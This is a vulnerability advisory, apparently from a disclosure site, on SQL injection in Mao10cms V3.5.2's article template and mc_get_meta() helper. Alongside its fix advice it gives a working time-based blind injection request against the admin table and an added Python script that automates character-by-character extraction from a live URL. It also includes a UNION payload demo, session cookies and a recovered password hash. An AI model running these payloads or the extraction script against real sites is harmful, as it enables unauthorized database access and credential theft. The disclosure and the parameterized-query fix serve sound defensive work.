### Brief description:
Front-end SQL injection in the latest Mao10cms
### Details:
Mao10cms has a sizeable user base; the current release, V3.5.2, was updated on 2015-06-25, so let's take a look at it.
The injection sits in a template file that several controllers render. The three vulnerabilities reported here correspond to the multiple injection points inside that one file, each reachable through a page that includes it.
The affected file is /theme/default/article/single.php; the relevant code:
```
<?php mc_template_part('header'); ?>
<?php foreach($page as $val) : ?>
<div id="single-head-img" class="pr hidden-xs">
<div class="single-head-img shi1" style="background-image: url(<?php if(mc_fmimg($_GET['id'])) : echo mc_fmimg($_GET['id']); else : echo mc_theme_url().'/img/user_bg.jpg'; endif; ?>);"></div>
<div class="single-head-img shi2"></div>
<div class="single-head-img shi3">
<h1><?php echo mc_user_display_name($_GET['id']); ?></h1>
<h4><?php echo mc_cut_str(strip_tags(mc_magic_out(mc_get_page_field($_GET['id'],'content'))), 80); ?></h4>
</div>
</div>
<div class="container">
<div class="row">
<div class="col-sm-12 col-md-10 col-md-offset-1 col-lg-8 col-lg-offset-2">
<ul class="list-inline mb-0 article-brd">
<li>
<a href="<?php echo U('article/index/term?id='.mc_get_meta($val['id'],'term')); ?>">
<i class="glyphicon glyphicon-th-list"></i> <?php echo mc_get_page_field(mc_get_meta($val['id'],'term'),'title'); ?>
</a>
</li>
<li class="pull-right hidden-xs">
<i class="glyphicon glyphicon-time"></i> <?php echo date('m/d H:i',$val['date']); ?>
</li>
<li class="pull-right hidden-xs">
<i class="glyphicon glyphicon-eye-open"></i> <?php echo mc_views_count($val['id']); ?>
</li>
</ul>
<!-- unrelated code omitted -->
```
The template calls mc_fmimg($_GET['id']) twice on the same line (and also hands $_GET['id'] to mc_user_display_name() and mc_get_page_field()); start with mc_fmimg():
```
// fetch a page's cover image: the raw id is passed on to mc_get_meta() (twice) and mc_catch_that_image()
function mc_fmimg($id) {
if(mc_get_meta($id,'fmimg')) {
return mc_get_meta($id,'fmimg');
} elseif(mc_catch_that_image($id)) {
return mc_catch_that_image($id);
} else {
return mc_option('fmimg');
}
};
```
$_GET['id'] is passed straight through to mc_get_meta(), so look there next:
```
// fetch a meta value; $page_id, $meta_key and $type are spliced into the SQL string exactly as received
function mc_get_meta($page_id,$meta_key,$array=true,$type='basic') {
$meta = M('meta')->where("page_id='$page_id' AND meta_key='$meta_key' AND type ='$type'")->order('id desc');
if($array) {
return $meta->getField('meta_value');
} else {
return $meta->getField('meta_value',true);
};
}
```
$page_id is concatenated into the WHERE clause with no escaping or type check, and because where() receives a pre-built string the framework has nothing left to escape, so anyone who controls the id parameter can inject SQL and read arbitrary data from the database.
For the test below I picked one URL that renders this template; when fixing, track down every place that includes this file (and every helper that passes $_GET['id'] into mc_get_meta()), since each one is a separate entry point.
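To make the flaw concrete, here is an added example (my own code, not Mao10cms's) that rebuilds mc_get_meta()'s string-assembled WHERE clause in Python over an in-memory SQLite database. The meta and admin tables, their columns and their rows are constructed for the demo (an assumed schema, not the project's real one). It runs a UNION payload in the same shape as the one used in the proof below (SQLite's `--` comment stands in for MySQL's `#`) against the vulnerable query, then runs the identical payload through a parameterized version that treats the value as data:

```python
import sqlite3

# Constructed sample data standing in for Mao10cms's meta and admin tables (assumed shape).
SCHEMA = """
CREATE TABLE meta (id INTEGER PRIMARY KEY, page_id TEXT, meta_key TEXT, meta_value TEXT, type TEXT);
CREATE TABLE admin (id INTEGER PRIMARY KEY, admin_name TEXT, admin_pass TEXT);
INSERT INTO meta (page_id, meta_key, meta_value, type) VALUES ('5', 'fmimg', '/img/cover5.jpg', 'basic');
INSERT INTO admin (admin_name, admin_pass) VALUES ('admin', 'f6fdffe48c908deb0f4c3bd36c032e72');
"""


def open_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def get_meta_vulnerable(conn, page_id, meta_key, type_="basic"):
    """Mirrors mc_get_meta(): the caller's value is interpolated straight into the WHERE clause.
    The surrounding parentheses mimic the `WHERE ( ... )` that ThinkPHP wraps around a string condition,
    which is why the advisory's payload opens with `')`."""
    sql = (
        "SELECT meta_value FROM meta WHERE ( page_id='%s' AND meta_key='%s' AND type='%s' ) ORDER BY id DESC"
        % (page_id, meta_key, type_)
    )
    return [row[0] for row in conn.execute(sql)]


def get_meta_fixed(conn, page_id, meta_key, type_="basic"):
    """Hardened form: every value travels as a bound parameter, never as SQL text."""
    sql = "SELECT meta_value FROM meta WHERE ( page_id=? AND meta_key=? AND type=? ) ORDER BY id DESC"
    return [row[0] for row in conn.execute(sql, (page_id, meta_key, type_))]


# UNION payload in the shape of the advisory's, with `-- ` in place of MySQL's `#`.
PAYLOAD = "123') UNION SELECT admin_pass FROM admin -- "


def demo():
    """Returns what each variant yields for a normal id and for the injected id."""
    conn = open_db()
    return {
        "normal": get_meta_vulnerable(conn, "5", "fmimg"),      # ['/img/cover5.jpg']
        "injected": get_meta_vulnerable(conn, PAYLOAD, "fmimg"),  # the admin password hash leaks
        "fixed": get_meta_fixed(conn, PAYLOAD, "fmimg"),          # [] : payload is just an unmatched string
    }


if __name__ == "__main__":
    for name, rows in demo().items():
        print(name, rows)
```

In the real Mao10cms code the equivalent fix is to stop hand-building the condition string: cast $page_id to an integer (page ids are numeric) or hand the conditions to where() as an array rather than a string, and apply the same to every other mc_get_* helper that interpolates caller-supplied input.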
The proof below uses a time-based blind injection: the UNIONed IF() calls sleep() only when the guessed character of admin_name is right, so the response delay reveals the value one character at a time. Note that mid(...,1,1) returns a single character, so the value it is compared against should be one character long.
Payload (sent as a POST):
```
POST /index.php?m=article&c=index&a=single&id=123')union/**/select/**/if(mid((select/**/admin_name/**/from/**/pe_admin/**/limit/**/0,1),1,1)='zs',sleep(1),0)%23 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh,zh-CN;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://localhost/index.php?m=article&c=index&a=single&id=5
Cookie: 2ev28n3dapp_admininfo=864cM2QjN%2BbkWmbIFVhnPZd5%2BrpdMp4xWzFseC%2Fbe4EBpDKafUGLY7WrakVbYuL46Bbsct6okOjqwOYiELEqJ6C9LBHCiz3RB7VTZ7XN6mwhnpI; bdshare_firstime=1430664757834; CNZZDATA1253530733=1001420044-1432556580-%7C1432556580; PHPSESSID=48jqli3eaqpfkl6i57p51pprn6; user_name=pigtest; user_pass=d0b942fd21ac7b9253a6175179ea7df9
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 4
id=5
```
When the guess is wrong, the page comes back without delay:
![wrong guess](https://images.seebug.org/upload/201507/07005241289d66ac6e24f95ff143265f6356558f.jpg)
When the guess is right, the response is held back by the sleep():
![correct guess](https://images.seebug.org/upload/201507/070052543e74062baffd3803af7e282af16bccec.jpg)
The full extraction can be automated with Burp Suite, sqlmap, or a small script of your own; in my local test it recovered the admin username admin and the stored password value f6fdffe48c908deb0f4c3bd36c032e72.
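As an added example of the "write your own script" option (my code, not the author's), the following automates the character-by-character extraction using exactly the payload shape shown above. The oracle is abstracted: http_oracle() times a real request against an assumed URL layout (http://localhost/index.php?m=article&c=index&a=single, as in the request above), while fake_oracle() is a constructed stand-in that evaluates the injected IF() against a made-up admin_name so the logic can be exercised offline:

```python
import re
import string
import time
from urllib.parse import quote
from urllib.request import urlopen

# Same shape as the advisory's payload: `')` closes ThinkPHP's `WHERE ( ... )`, the UNION adds an
# IF() that sleeps only when the guessed character of admin_name matches, and %23 (#) comments out
# the rest of the original query. pe_admin is the table name the advisory's payload uses.
PAYLOAD_TEMPLATE = (
    "123')union/**/select/**/if(mid((select/**/admin_name/**/from/**/pe_admin/**/limit/**/0,1),"
    "{pos},1)='{ch}',sleep({delay}),0)%23"
)


def build_payload(pos, ch, delay=1):
    """Payload that sleeps `delay` seconds iff character `pos` (1-based) of admin_name equals `ch`."""
    return PAYLOAD_TEMPLATE.format(pos=pos, ch=ch, delay=delay)


def extract(oracle, charset=string.ascii_lowercase + string.digits + "_", max_len=32, delay=1.0):
    """Recover admin_name one character at a time.

    `oracle(payload)` delivers the payload as the id parameter and returns the response time in seconds;
    a response taking at least `delay` seconds means the guess was right. Extraction stops at the first
    position where no character in `charset` matches (end of string, or a character outside the charset).
    Quotes and backslashes are deliberately left out of the default charset because they would break the
    single-quoted literal inside the payload.
    """
    recovered = ""
    for pos in range(1, max_len + 1):
        for ch in charset:
            if oracle(build_payload(pos, ch, int(delay))) >= delay:
                recovered += ch
                break
        else:
            break  # no candidate matched: the string has ended
    return recovered


def http_oracle(base_url, timeout=15):
    """Oracle against a live instance (assumed URL layout: base_url like
    http://localhost/index.php?m=article&c=index&a=single). Not exercised offline."""
    def oracle(payload):
        url = base_url + "&id=" + quote(payload, safe="()'=,*/%")  # keep %23 as the encoded '#'
        start = time.monotonic()
        try:
            urlopen(url, timeout=timeout).read()
        except Exception:
            pass  # a timeout still counts as elapsed time
        return time.monotonic() - start
    return oracle


def fake_oracle(secret):
    """Constructed stand-in for the target, for offline testing: evaluates the injected IF() the way
    MySQL would against a made-up admin_name and reports the delay it would have produced, without
    actually sleeping."""
    pattern = re.compile(r"\),(\d+),1\)='(.)',sleep\((\d+)\)")

    def oracle(payload):
        m = pattern.search(payload)
        pos, ch, d = int(m.group(1)), m.group(2), int(m.group(3))
        hit = pos <= len(secret) and secret[pos - 1] == ch
        return float(d) if hit else 0.0
    return oracle


if __name__ == "__main__":
    print(extract(fake_oracle("admin")))  # offline demo
    # Live: print(extract(http_oracle("http://localhost/index.php?m=article&c=index&a=single"), delay=3.0))
```

Against a real target, measure the normal response time first and choose `delay` comfortably above its jitter (3 seconds is a safer choice than the 1 second used in the proof), otherwise a slow but non-sleeping response is misread as a hit and the recovered string drifts after the first wrong character.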
### Proof of vulnerability:
See the details above.